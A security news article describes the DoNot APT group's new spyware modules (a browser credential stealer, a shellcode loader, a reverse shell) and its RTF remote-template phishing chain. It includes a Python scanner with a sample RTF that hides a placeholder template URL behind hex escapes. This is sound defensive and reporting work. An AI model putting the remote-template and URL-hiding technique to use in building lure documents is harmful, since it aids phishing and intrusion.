Sophisticated DoNot APT group upgrades its malware

August 24, 2022

The DoNot advanced persistent threat (APT) group has resurfaced with upgraded tactics, techniques, and procedures (TTPs). DoNot, also tracked as APT-C-35, has been active for more than five years and is notorious for targeting individuals and organisations across South Asia.

The group has added new modules to its Windows spyware framework (YTY/Jaca), and the new samples are already being used in the wild. The additions are a browser stealer component and a new shellcode loader that loads a DLL variant of the group's reverse shell module.

According to analysis of the recent samples, the browser stealer harvests saved browsing history and stored login credentials from Mozilla Firefox and Google Chrome.

DoNot APT has also introduced a new infection chain to compromise its targets.

According to the analysis, the latest infection chain delivers a new module of the Windows framework. Researchers observed the group using malicious RTF documents in a recent spear-phishing email campaign aimed at government sector targets.

When a target opens one of these RTF documents, Word fetches a malicious remote template from the attacker-controlled command-and-control server with an HTTP GET request. Once the remote template has loaded on the target system, it lures the user into enabling the malicious macros it carries.

The group then uses these macros in the later stages of the attack to deploy the reverse shell module. The new chain shows how a sophisticated team can carry out a multi-stage operation with little friction and fully compromise its target.
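The remote-template step above is the one a defender can check for before the document is ever opened: an RTF file carries the template reference in a `\*\template` destination, and if that reference is a URL, Word fetches it over HTTP on open. As an added example (not code from the original article, from the researchers, or from the threat group), the following Python scanner extracts every such reference from an RTF, undoes the `\'hh` hex escaping attackers use to hide a URL, and flags any that resolve over the network. The sample document and the `example.test` hostnames are constructed for this example and are not indicators from the campaign.

```python
r"""Flag RTF files that reference a remote Word template.

Added example for this article, not tooling from the researchers or the
group it describes. RTF remote-template injection stores the template path
in a `\*\template` destination; when that path is a URL, Word fetches it
with an HTTP GET when the document is opened. This scanner extracts every
such reference, undoes the RTF escaping used to hide URLs, and reports
whether the target is remote.
"""
import re
from dataclasses import dataclass
from typing import List

# `{\*\template <path>}` - the argument runs up to the closing brace.
TEMPLATE_RE = re.compile(rb"\{\\\*\\template\s*([^{}]*)\}", re.IGNORECASE)

# Anything that resolves off the local machine: URLs and UNC paths.
REMOTE_PREFIXES = (b"http://", b"https://", b"ftp://", b"\\\\", b"//")


@dataclass
class Finding:
    target: str   # decoded template path or URL
    remote: bool  # True if Word would fetch it over the network
    offset: int   # byte offset of the destination inside the file


def unescape_rtf(raw: bytes) -> bytes:
    r"""Undo RTF text escaping so an obfuscated URL becomes readable.

    `\'hh` encodes one byte as two hex digits; `\\` encodes a backslash.
    """
    raw = re.sub(rb"\\'([0-9a-fA-F]{2})",
                 lambda m: bytes.fromhex(m.group(1).decode("ascii")), raw)
    return raw.replace(b"\\\\", b"\\")


def scan_rtf(data: bytes) -> List[Finding]:
    r"""Return every `\*\template` reference found in an RTF byte string."""
    if not data.lstrip().startswith(b"{\\rtf"):
        raise ValueError("not an RTF document")
    findings = []
    for m in TEMPLATE_RE.finditer(data):
        target = unescape_rtf(m.group(1)).strip()
        remote = target.lower().startswith(REMOTE_PREFIXES)
        findings.append(Finding(target.decode("latin-1"), remote, m.start()))
    return findings


def has_remote_template(data: bytes) -> bool:
    """Triage verdict: does the document pull a template from the network?"""
    return any(f.remote for f in scan_rtf(data))


# Constructed sample for this example; the hostnames are placeholders, not
# indicators from the campaign. It holds one plain remote reference, one
# local one, and one remote reference hidden behind \'hh hex escapes.
SAMPLE_RTF = (
    rb"{\rtf1\ansi\deff0{\fonttbl{\f0 Times New Roman;}}"
    rb"{\*\template http://templates.example.test/report.dotm}"
    rb"{\*\template C:\\Users\\Public\\Templates\\normal.dotm}"
    rb"{\*\template \'68\'74\'74\'70\'73://cdn.example.test/t.dotm}"
    rb"\pard Quarterly report\par}"
)

if __name__ == "__main__":
    for f in scan_rtf(SAMPLE_RTF):
        print(f"offset={f.offset:5d} remote={str(f.remote):5} target={f.target}")
    verdict = "REMOTE TEMPLATE" if has_remote_template(SAMPLE_RTF) else "clean"
    print("verdict:", verdict)
```

Run on the constructed sample, the scanner reports three template references: the plain URL and the hex-escaped one as remote, the `C:\Users\...` path as local. A triage pipeline would quarantine on any remote hit; the decoded target is what you would pivot on to block the download before the macro-bearing template ever reaches the user.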

Defending against threats like DoNot APT requires a defence-in-depth strategy built from multiple layers of security controls and procedures. Experts also recommend that organisations deploy technologies such as XDR, EDR, and network firewalls to detect unwanted activity during the intrusion phase of an attack.

These solutions matter because the group targets security gaps that only a few organisations have closed.
